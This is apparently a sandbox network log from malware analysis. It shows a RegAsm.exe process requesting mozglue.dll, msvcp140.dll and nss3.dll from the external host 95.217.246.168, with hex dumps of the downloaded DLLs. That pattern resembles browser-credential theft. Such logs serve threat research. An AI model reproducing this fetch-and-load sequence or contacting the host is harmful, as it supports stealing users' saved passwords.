2024-04-24 14:49:05 UTC	158	OUT	GET /mozglue.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.246.168 Cache-Control: no-cache
2024-04-24 14:49:06 UTC	246	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 24 Apr 2024 14:49:06 GMT Content-Type: application/octet-stream Content-Length: 608080 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: close ETag: "6315a9f4-94750" Accept-Ranges: bytes
2024-04-24 14:49:06 UTC	16138	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W,
2024-04-24 14:49:06 UTC	16384	IN	Data Raw: ff ff 8d 41 24 50 e8 fb 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 62 ff ff ff 8d 41 24 50 e8 df 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc eb 92 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 56 8b 75 0c 8b 8e b0 00 00 00 83 f9 10 0f 83 e4 00 00 00 c7 86 ac 00 00 00 00 00 00 00 c7 86 b0 00 00 00 0f 00 00 00 c6 86 9c 00 00 00 00 8b 8e 98 00 00 00 83 f9 10 0f 83 e0 00 00 00 c7 86 94 00 00 00 00 00 00 00 c7 86 98 00 00 00 0f 00 00 00 c6 86 84 00 00 00 00 8b 8e 80 00 00 00 83 f9 10 0f 83 dc 00 00 00 c7 46 7c 00 00 00 00 c7 86 80 00 00 00 0f 00 00 00 c6 46 6c 00 8b 4e 68 83 f9 10 0f 83 de 00 00 00 c7 46 64 00 00 00 00 c7 46 68 0f 00 00 00 c6 46 54 00 8b 4e 50 83 f9 10 0f 83 e3 00 00 00 c7 46 4c 00 00 00 00 c7 46 50 0f 00 00 00 c6 46 Data Ascii: A$P~#HbA$P~#HUVuF\|FlNhFdFhFTNPFLFPF
2024-04-24 14:49:06 UTC	16384	IN	Data Raw: 0f 86 bd 05 00 00 50 e8 7a d3 01 00 83 c4 04 e9 e1 f9 ff ff 8b 45 90 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 b4 05 00 00 50 e8 57 d3 01 00 83 c4 04 e9 dc f9 ff ff 8b 85 78 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 a8 05 00 00 50 e8 31 d3 01 00 83 c4 04 e9 d4 f9 ff ff 8b 85 60 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 9c 05 00 00 50 e8 0b d3 01 00 83 c4 04 e9 d2 f9 ff ff 8b 85 48 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 90 05 00 00 50 e8 e5 d2 01 00 83 c4 04 e9 d6 f9 ff ff 8b b5 24 ff ff ff 89 0e 8b 85 2c ff ff ff 89 46 04 8b 4d f0 31 e9 e8 52 27 03 00 89 f0 81 c4 d0 00 00 00 5e 5f 5b 5d c3 89 f1 89 fa ff b5 30 ff ff ff e9 30 f4 ff ff 89 f1 81 c6 4c ff ff ff 39 c8 74 63 8d 8d 3c ff ff ff 56 e8 de bc ff ff 89 f1 89 fa e8 d5 f1 Data Ascii: PzEPWxP1`PHP$,FM1R'^_[]00L9tc<V
2024-04-24 14:49:07 UTC	16384	IN	Data Raw: 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 03 b9 59 17 b7 d1 89 f8 f7 e1 89 d1 c1 e9 0d 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 02 89 f8 c1 e8 05 b9 c5 5a 7c 0a f7 e1 89 d1 c1 e9 07 bb ff 00 00 00 89 c8 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c1 80 c9 30 ba 83 de 1b 43 89 f8 f7 e2 8b 06 8b 7d 08 88 4c 38 01 c1 ea 12 89 d0 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c2 80 ca 30 89 f1 8b 06 8b 75 08 88 14 06 8b 39 8d 47 07 89 01 83 c7 0d b9 cd cc cc cc 8b 75 ec 89 f0 f7 e1 89 d1 c1 e9 03 8d 04 09 8d 04 80 89 f3 29 c3 80 cb 30 89 c8 ba cd cc cc cc f7 e2 8b 45 08 88 1c 38 89 c3 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 7d 0c 8b 07 88 4c 18 05 b9 1f 85 eb 51 89 f0 f7 e1 89 d1 c1 e9 05 89 c8 ba Data Ascii: )0LY)0LZ\|!i(0C}L8!i(0u9Gu)0E8)0}LQ
2024-04-24 14:49:07 UTC	16384	IN	Data Raw: 00 00 00 31 c9 8d 14 08 83 c2 0c f2 0f 10 42 f4 8b 5d f0 f2 0f 11 04 0b 8b 7a fc c7 42 fc 00 00 00 00 89 7c 0b 08 8b 1e 8b 7e 04 8d 3c 7f 8d 3c bb 83 c1 0c 39 fa 72 cd e9 81 00 00 00 8b 06 8d 0c 49 8d 0c 88 89 4d f0 31 d2 8d 1c 10 83 c3 0c f2 0f 10 43 f4 f2 0f 11 04 17 8b 4b fc c7 43 fc 00 00 00 00 89 4c 17 08 83 c2 0c 3b 5d f0 72 da 8b 46 04 85 c0 0f 8e 02 ff ff ff 8b 1e 8d 04 40 8d 04 83 89 45 f0 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 ec 52 01 00 83 c4 04 83 c3 0c 3b 5d f0 0f 83 d4 fe ff ff eb db 31 c0 40 89 45 ec e9 27 ff ff ff 8d 0c 49 8d 3c 88 89 c3 39 fb 73 20 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 b0 52 01 00 83 c4 04 83 c3 0c 39 fb 72 e2 8b 1e 53 e8 9e 52 01 00 83 c4 04 8b 45 f0 89 06 8b 45 ec 89 46 08 e9 8b fe ff ff 68 a7 fa 07 Data Ascii: 1B]zB\|~<<9rIM1CKCL;]rF@ECCtPR;]1@E'I<9s CCtPR9rSREEFh
2024-04-24 14:49:07 UTC	16384	IN	Data Raw: 1b 89 c8 e9 b3 fe ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 07 89 c8 e9 c2 fe ff ff ff 15 b0 bf 08 10 cc cc cc cc 55 89 e5 57 56 89 ce 8b 79 20 85 ff 74 28 f0 ff 4f 38 75 22 8b 4f 14 83 f9 10 73 5f c7 47 10 00 00 00 00 c7 47 14 0f 00 00 00 c6 07 00 57 e8 2d 13 01 00 83 c4 04 8b 7e 18 c7 46 18 00 00 00 00 85 ff 74 1c 8b 07 85 c0 74 0d 50 ff 15 04 be 08 10 c7 07 00 00 00 00 57 e8 03 13 01 00 83 c4 04 8b 46 08 85 c0 75 2f 8b 46 04 85 c0 74 09 50 e8 ec 12 01 00 83 c4 04 5e 5f 5d c3 8b 07 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 76 20 50 e8 cf 12 01 00 83 c4 04 eb 86 c7 05 f4 f8 08 10 1a 2b 08 10 cc b9 18 00 00 00 e8 0d 80 02 00 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 04 89 c8 eb cf ff 15 b0 bf 08 10 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 e4 f8 Data Ascii: H) sUWVy t(O8u"Os_GGW-~FttPWFu/FtP^_]v P+H) sUSWV
2024-04-24 14:49:07 UTC	16384	IN	Data Raw: 00 00 c7 44 24 34 07 00 00 00 66 c7 44 24 20 00 00 57 e8 e1 37 06 00 83 c4 04 89 c6 83 f8 07 8b 5c 24 04 0f 87 4b 03 00 00 8d 44 24 20 89 70 10 89 f1 01 f1 51 57 50 e8 fe 37 06 00 83 c4 0c 66 c7 44 74 20 00 00 8b 44 24 30 8b 4c 24 34 89 ca 29 c2 83 fa 11 0f 82 fd 05 00 00 8d 50 11 89 54 24 30 83 f9 08 72 06 8b 4c 24 20 eb 04 8d 4c 24 20 0f b7 15 de 4d 08 10 66 89 54 41 20 0f 10 05 ce 4d 08 10 0f 11 44 41 10 0f 10 05 be 4d 08 10 0f 11 04 41 66 c7 44 41 22 00 00 bf 10 00 00 00 57 e8 60 3e 00 00 83 c4 04 89 c6 8b 45 0c f2 0f 10 40 20 f2 0f 11 06 f2 0f 10 40 28 f2 0f 11 46 08 83 7c 24 34 08 72 06 8b 44 24 20 eb 04 8d 44 24 20 57 56 6a 03 6a 00 50 53 ff 15 2c e3 08 10 89 c3 56 e8 9e d2 00 00 83 c4 04 8b 4c 24 34 83 f9 08 8b 7c 24 08 0f 83 b0 03 00 00 85 db 0f Data Ascii: D$4fD$ W7\$KD$ pQWP7fDt D$0L$4)PT$0rL$ L$ MfTA MDAMAfDA"W`>E@ @(F\|$4rD$ D$ WVjjPS,VL$4\|$
2024-04-24 14:49:07 UTC	16384	IN	Data Raw: 08 0f 86 cc 02 00 00 83 c3 0f 89 d8 83 e0 f0 89 44 24 1c c1 eb 04 c1 e3 05 8d 34 1f 83 c6 50 80 7f 3c 00 89 7c 24 10 89 5c 24 18 74 0a 83 7f 40 00 0f 84 29 06 00 00 8d 47 0c 89 44 24 20 50 ff 15 30 be 08 10 8b 16 85 d2 0f 84 38 01 00 00 83 7a 08 00 0f 84 2e 01 00 00 8b 4a 04 8b 74 8a 0c 85 f6 0f 84 eb 01 00 00 8b 5f 40 85 db 75 60 0f bc fe 89 cb c1 e3 05 09 fb 0f bb fe 8b 7c 24 10 8b 44 24 18 0f af 5c 07 58 8b 44 07 68 89 74 8a 0c 01 d0 01 c3 83 42 08 ff 85 db 0f 84 a2 05 00 00 8b 44 24 1c 01 47 2c ff 74 24 20 ff 15 b0 be 08 10 85 db 0f 84 93 05 00 00 8b 4c 24 60 31 e9 e8 51 e7 01 00 89 d8 8d 65 f4 5e 5f 5b 5d c3 89 4c 24 04 89 54 24 14 8b 0b 8b 7b 04 89 3c 24 0f a4 cf 17 89 c8 c1 e0 17 31 c8 8b 53 0c 33 3c 24 89 7c 24 08 8b 4b 08 89 0c 24 89 53 04 0f a4 Data Ascii: D$4P<\|$\$t@)GD$ P08z.Jt_@u`\|$D$\XDhtBD$G,t$ L$`1Qe^_[]L$T${<$1S3<$\|$K$S
2024-04-24 14:49:07 UTC	16384	IN	Data Raw: 58 e9 75 ff ff ff c7 44 24 3c 00 00 00 00 8b 5c 24 04 e9 a5 fe ff ff 31 d2 a8 10 0f 44 54 24 18 31 c9 39 f2 0f 97 c0 0f 82 e1 fe ff ff 88 c1 e9 d5 fe ff ff b0 01 e9 ec fd ff ff 8b 46 04 83 f8 01 0f 87 13 01 00 00 89 f2 8b 06 31 c9 85 c0 8b 74 24 1c 0f 84 39 04 00 00 8b 48 04 83 e1 fe 89 0a 89 d1 83 e1 fe 89 54 24 04 8b 50 04 83 e2 01 09 ca 89 50 04 8b 54 24 04 8b 52 04 83 e2 01 09 ca 89 50 04 8b 4c 24 04 80 49 04 01 83 60 04 01 89 c1 e9 fb 03 00 00 c7 44 24 28 00 00 00 00 e9 f9 fd ff ff 8d 74 24 54 89 f1 e8 37 0b fe ff 8b 1e e9 47 ff ff ff 83 e3 fe 89 58 04 89 d6 8b 1a 85 db 0f 84 fb 01 00 00 8b 43 04 83 e0 fe 89 06 89 f0 83 e0 fe 8b 4b 04 83 e1 01 09 c1 89 4b 04 8b 4e 04 89 c8 83 e0 fe 0f 84 c0 01 00 00 8b 10 83 e2 fe 83 e1 01 09 d1 89 4e 04 89 30 8b 4b Data Ascii: XuD$<\$1DT$19F1t$9HT$PPT$RPL$I`D$(t$T7GXCKKNN0K
2024-04-24 14:49:07 UTC	16384	IN	Data Raw: c1 72 d1 88 cb 8b 50 04 83 e2 fe eb cc 83 e3 fe 89 1a 89 d6 83 e6 fe 8b 18 8b 48 04 83 e1 01 09 f1 89 48 04 85 db 0f 84 8d 0a 00 00 80 63 04 fe 8b 74 24 14 39 16 75 07 89 06 e9 69 ff ff ff 83 e0 fe 8b 56 04 83 e2 01 8d 0c 02 89 4e 04 85 c0 0f 84 25 0a 00 00 8b 08 83 e1 fe 09 d1 89 4e 04 89 30 8b 4e 04 83 e1 01 8b 50 04 83 e2 fe 09 ca 89 50 04 80 4e 04 01 85 ff 0f 84 1f 0a 00 00 39 37 0f 84 a0 05 00 00 e9 e0 05 00 00 8b 4c 24 1c 8b 19 89 d9 ba 00 f0 ff ff 21 d1 8b 70 08 21 d6 31 d2 39 f1 0f 97 c2 b9 ff ff ff ff 0f 42 d1 85 d2 0f 85 59 05 00 00 e9 c0 05 00 00 89 c1 85 d2 0f 85 c2 fe ff ff 8b 54 24 04 c7 02 00 00 00 00 8b 4c 24 08 c7 44 b1 14 01 00 00 00 83 fb 01 0f 84 17 02 00 00 89 10 8b 54 24 20 8b 44 24 48 85 c0 0f 84 c2 09 00 00 80 60 04 fe 8b 4c 24 0c Data Ascii: rPHHct$9uiVN%N0NPPN97L$!p!19BYT$L$DT$ D$H`L$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49756	95.217.246.168	443	4904	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-24 14:49:08 UTC	159	OUT	GET /msvcp140.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.246.168 Cache-Control: no-cache
2024-04-24 14:49:09 UTC	246	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 24 Apr 2024 14:49:09 GMT Content-Type: application/octet-stream Content-Length: 450024 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: close ETag: "6315a9f4-6dde8" Accept-Ranges: bytes
2024-04-24 14:49:09 UTC	16138	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_
2024-04-24 14:49:10 UTC	16384	IN	Data Raw: 68 00 72 00 00 00 68 00 75 00 2d 00 68 00 75 00 00 00 68 00 79 00 2d 00 61 00 6d 00 00 00 69 00 64 00 2d 00 69 00 64 00 00 00 69 00 73 00 2d 00 69 00 73 00 00 00 69 00 74 00 2d 00 63 00 68 00 00 00 69 00 74 00 2d 00 69 00 74 00 00 00 6a 00 61 00 2d 00 6a 00 70 00 00 00 6b 00 61 00 2d 00 67 00 65 00 00 00 6b 00 6b 00 2d 00 6b 00 7a 00 00 00 6b 00 6e 00 2d 00 69 00 6e 00 00 00 6b 00 6f 00 2d 00 6b 00 72 00 00 00 6b 00 6f 00 6b 00 2d 00 69 00 6e 00 00 00 00 00 6b 00 79 00 2d 00 6b 00 67 00 00 00 6c 00 74 00 2d 00 6c 00 74 00 00 00 6c 00 76 00 2d 00 6c 00 76 00 00 00 6d 00 69 00 2d 00 6e 00 7a 00 00 00 6d 00 6b 00 2d 00 6d 00 6b 00 00 00 6d 00 6c 00 2d 00 69 00 6e 00 00 00 6d 00 6e 00 2d 00 6d 00 6e 00 00 00 6d 00 72 00 2d 00 69 00 6e 00 00 00 6d 00 73 00 2d Data Ascii: hrhu-huhy-amid-idis-isit-chit-itja-jpka-gekk-kzkn-inko-krkok-inky-kglt-ltlv-lvmi-nzmk-mkml-inmn-mnmr-inms-
2024-04-24 14:49:10 UTC	16384	IN	Data Raw: 00 10 e8 7b 00 10 04 7c 00 10 00 00 00 00 d8 4c 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 f4 8a 00 10 00 00 00 00 01 00 00 00 04 00 00 00 44 8b 00 10 58 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 14 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 34 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 84 8b 00 10 98 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 34 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 74 8b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 58 4d 06 10 c8 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 d8 8b 00 10 ec 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 58 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 c8 8b 00 10 00 Data Ascii: {\|L@DX}0}}M@4}0}}4M@tXM}0}}XM@
2024-04-24 14:49:10 UTC	16384	IN	Data Raw: c0 89 45 f4 de ea d9 c9 d9 5d e8 d9 45 e8 d9 55 10 d9 ee da e9 df e0 f6 c4 44 7b 05 dd d8 d9 45 10 8d 45 ec 50 8d 45 f8 50 d9 5d ec e8 fc fa ff ff 59 59 3b f3 0f 8c aa fd ff ff eb 10 8d 4e 01 d9 1c b7 3b cb 7d 06 d9 ee d9 5c b7 04 5e 8b c7 5f 5b c9 c3 55 8b ec 51 56 33 f6 39 75 14 7e 37 d9 ee 57 8b 7d 10 d9 04 b7 d9 5d fc d9 45 fc dd e1 df e0 dd d9 f6 c4 44 7b 1a 51 d9 1c 24 ff 75 0c ff 75 08 e8 97 fc ff ff d9 ee 83 c4 0c 46 3b 75 14 7c d2 dd d8 5f 8b 45 08 5e c9 c3 55 8b ec 51 51 8b 4d 0c 85 c9 75 04 d9 ee c9 c3 8b 55 08 83 f9 01 0f 84 9d 00 00 00 d9 02 d9 5d fc d9 45 fc d9 ee dd e1 df e0 f6 c4 44 0f 8b 82 00 00 00 d9 42 04 d9 5d fc d9 45 fc dd e1 df e0 f6 c4 44 7b 6e 83 f9 02 74 5d d9 42 08 d9 5d fc d9 45 fc dd e2 df e0 dd da f6 c4 44 7b 49 d9 c2 d8 c1 Data Ascii: E]EUD{EEPEP]YY;N;}\^_[UQV39u~7W}]ED{Q$uuF;u\|_E^UQQMuU]EDB]ED{nt]B]ED{I
2024-04-24 14:49:10 UTC	16384	IN	Data Raw: f7 0f b7 06 66 3b c1 74 0e 66 3b c2 74 09 8b 45 08 33 db 8b 30 eb 43 03 f7 6a 04 5b 89 75 f8 66 83 3e 28 89 5d f4 75 32 8b de 03 df 68 07 01 00 00 0f b7 03 50 ff 15 ac 72 06 10 59 59 85 c0 75 e9 0f b7 03 83 f8 5f 74 e1 89 5d f8 8b 5d f4 83 f8 29 75 06 8b 75 f8 83 c6 02 8b 45 0c 85 c0 74 02 89 30 8b 45 08 5f 89 30 8b c3 5e 5b c9 c3 55 8b ec 83 ec 48 a1 c0 41 06 10 33 c5 89 45 fc 6b 4d 18 07 33 d2 8b 45 10 53 8b 5d 14 56 8b 75 0c 89 75 d0 89 45 b8 89 55 bc 89 55 c4 89 55 c0 89 4d cc 57 8b fa 83 f9 23 7e 06 6a 23 59 89 4d cc 6a 30 58 89 13 89 53 04 66 39 06 75 12 c7 45 c4 01 00 00 00 83 c6 02 66 39 06 74 f8 89 75 d0 0f b7 0e b8 b8 2d 00 10 89 4d c8 8b 4d cc c7 45 d4 16 00 00 00 8b 75 c8 66 39 30 8b 75 d0 74 0b 83 c0 02 83 6d d4 01 75 ec 8b c2 85 c0 74 26 3b Data Ascii: f;tf;tE30Cj[uf>(]u2hPrYYu_t]])uuEt0E_0^[UHA3EkM3ES]VuuEUUUMW#~j#YMj0XSf9uEf9tu-MMEuf90utmut&;
2024-04-24 14:49:10 UTC	16384	IN	Data Raw: cc cc cc cc cc cc 55 8b ec 6a ff 68 09 e7 03 10 64 a1 00 00 00 00 50 a1 c0 41 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 e8 79 7b 00 00 50 e8 71 d8 ff ff 59 8b 40 0c 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c3 cc cc 55 8b ec 83 79 38 00 8b 45 08 75 03 83 c8 04 ff 75 0c 50 e8 28 00 00 00 5d c2 08 00 cc cc cc cc 55 8b ec 6a 00 ff 75 08 e8 13 00 00 00 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 83 ec 1c 83 e0 17 89 41 0c 8b 49 10 56 23 c8 74 43 80 7d 0c 00 75 42 f6 c1 04 74 07 be 78 54 00 10 eb 0f be 90 54 00 10 f6 c1 02 75 05 be a8 54 00 10 8d 45 f8 6a 01 50 e8 f7 13 00 00 59 59 50 56 8d 4d e4 e8 bc e2 ff ff 68 a4 1a 04 10 8d 45 e4 50 eb 09 5e c9 c2 08 00 6a 00 6a 00 e8 f0 93 02 00 cc 53 57 8b f9 83 7f 4c 00 75 04 33 db eb 24 56 e8 Data Ascii: UjhdPA3PEdy{PqY@MdYUy8EuuP(]Uju]UEAIV#tC}uBtxTTuTEjPYYPVMhEP^jjSWLu3$V
2024-04-24 14:49:10 UTC	16384	IN	Data Raw: 83 c4 10 c6 04 1e 00 83 f8 10 72 0b 40 50 ff 37 e8 54 95 ff ff 59 59 89 37 8b c7 5f 5e 5b c9 c2 0c 00 e8 b3 be ff ff cc 55 8b ec 83 ec 0c 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d fc 3b c2 72 69 8b 43 14 8d 3c 11 57 8b cb 89 45 f4 e8 88 b1 ff ff 8b f0 8d 4e 01 51 e8 b2 94 ff ff 59 ff 75 18 89 7b 10 8d 4d 0c ff 75 14 8b 7d f4 89 45 f8 89 73 14 ff 75 10 ff 75 fc 83 ff 10 72 17 8b 33 56 50 e8 6b 03 00 00 8d 47 01 50 56 e8 d2 94 ff ff 59 59 eb 07 53 50 e8 56 03 00 00 8b 45 f8 5f 89 03 8b c3 5e 5b c9 c2 14 00 e8 25 be ff ff cc 55 8b ec 83 ec 10 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d f0 3b c2 0f 82 8f 00 00 00 8b 43 14 8d 3c 11 57 8b cb 89 45 fc e8 f6 b0 ff ff 8b f0 8d 4e 01 51 e8 20 94 ff ff 83 7d fc 10 59 0f be 4d 14 89 Data Ascii: r@P7TYY7_^[UUSVWK+M;riC<WENQYu{Mu}Esuur3VPkGPVYYSPVE_^[%UUSVWK+M;C<WENQ }YM
2024-04-24 14:49:10 UTC	16384	IN	Data Raw: 4d d4 53 33 c0 03 04 cb 52 13 7c cb 04 56 57 50 e8 f1 02 02 00 5b 8b 5d 08 8b f9 8b 4d d4 8b 75 d8 89 54 cb 04 8b 55 e8 89 04 cb 83 e9 01 89 4d d4 79 cf 5f 5e 5b c9 c3 55 8b ec 51 56 8b 75 14 33 d2 85 f6 7e 5f 53 8b 5d 08 29 5d 10 57 8b fb 89 75 fc 8b 5d 10 8b 0c 3b 03 0f 8b 44 3b 04 13 47 04 03 ca 89 0f 8d 7f 08 83 d0 00 8b d0 89 57 fc 83 67 fc 00 83 ee 01 75 dc 0b c6 8b 5d 08 74 22 8b 4d fc 3b 4d 0c 7d 1a 01 14 cb 8b 54 cb 04 13 d6 33 f6 89 54 cb 04 8b c2 21 74 cb 04 41 0b c6 75 e1 5f 5b 5e c9 c3 55 8b ec 8b 55 08 56 8b 75 0c 83 c2 f8 8d 14 f2 8b 02 0b 42 04 75 0b 8d 52 f8 4e 8b 0a 0b 4a 04 74 f5 8b c6 5e 5d c3 55 8b ec 53 56 33 db 33 f6 39 5d 0c 7e 30 57 8b 7d 08 ff 75 14 ff 75 10 ff 74 f7 04 ff 34 f7 e8 73 03 02 00 03 c3 89 04 f7 83 d2 00 8b da 89 5c Data Ascii: MS3R\|VWP[]MuTUMy_^[UQVu3~_S])]Wu];D;GWgu]t"M;M}T3T!tAu_[^UUVuBuRNJt^]USV339]~0W}uut4s\
2024-04-24 14:49:10 UTC	16384	IN	Data Raw: 89 75 fc 89 46 04 c7 06 7c 69 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 e8 65 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 56 8b f1 ff 76 0c c7 06 4c 68 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 56 8b f1 ff 76 0c c7 06 8c 66 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc 56 8b f1 c7 06 50 69 00 10 e8 e2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 c7 06 90 67 00 10 e8 c2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 ff 76 08 c7 06 7c 69 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 Data Ascii: uF\|ifrjFqY^UQEVuFefrjFqY^VvLhqY(R^VvfqY(R^VPiq(R^Vgq(R^Vv\|iqY(R
2024-04-24 14:49:10 UTC	16384	IN	Data Raw: 80 7f 04 00 75 07 8b cf e8 85 26 00 00 0f b7 47 06 50 ff b5 74 ff ff ff e8 9a a8 ff ff 59 59 83 f8 0a 73 3c 8a 80 2c 6a 00 10 8b 4d 8c 88 85 64 ff ff ff ff b5 64 ff ff ff e8 5f 18 ff ff 8b 4d d8 8d 45 d8 83 fb 10 72 02 8b c1 80 3c 30 7f 74 4c 8d 45 d8 83 fb 10 72 02 8b c1 fe 04 30 eb 3a 8d 45 d8 83 fb 10 72 03 8b 45 d8 80 3c 30 00 74 45 80 7f 04 00 0f b7 47 06 75 0b 8b cf e8 10 26 00 00 0f b7 47 06 66 3b 85 60 ff ff ff 75 27 6a 00 8d 4d d8 e8 04 18 ff ff 46 8b 5d ec 8b cf e8 24 11 00 00 ff 75 98 8b cf e8 de 72 00 00 84 c0 0f 84 4a ff ff ff 8b 5d 90 85 f6 74 13 83 7d ec 10 8d 45 d8 72 03 8b 45 d8 80 3c 30 00 7e 52 46 8a 45 a7 83 7d d4 10 8d 55 c0 72 03 8b 55 c0 84 c0 75 49 85 f6 74 5e 8a 0a 80 f9 7f 74 57 83 ee 01 74 11 83 7d ec 10 8d 45 d8 72 03 8b 45 d8 Data Ascii: u&GPtYYs<,jMdd_MEr<0tLEr0:ErE<0tEGu&Gf;`u'jMF]$urJ]t}ErE<0~RFE}UrUuIt^tWt}ErE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49758	95.217.246.168	443	4904	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-24 14:49:12 UTC	155	OUT	GET /nss3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.246.168 Cache-Control: no-cache
2024-04-24 14:49:13 UTC	248	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 24 Apr 2024 14:49:12 GMT Content-Type: application/octet-stream Content-Length: 2046288 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: close ETag: "6315a9f4-1f3950" Accept-Ranges: bytes
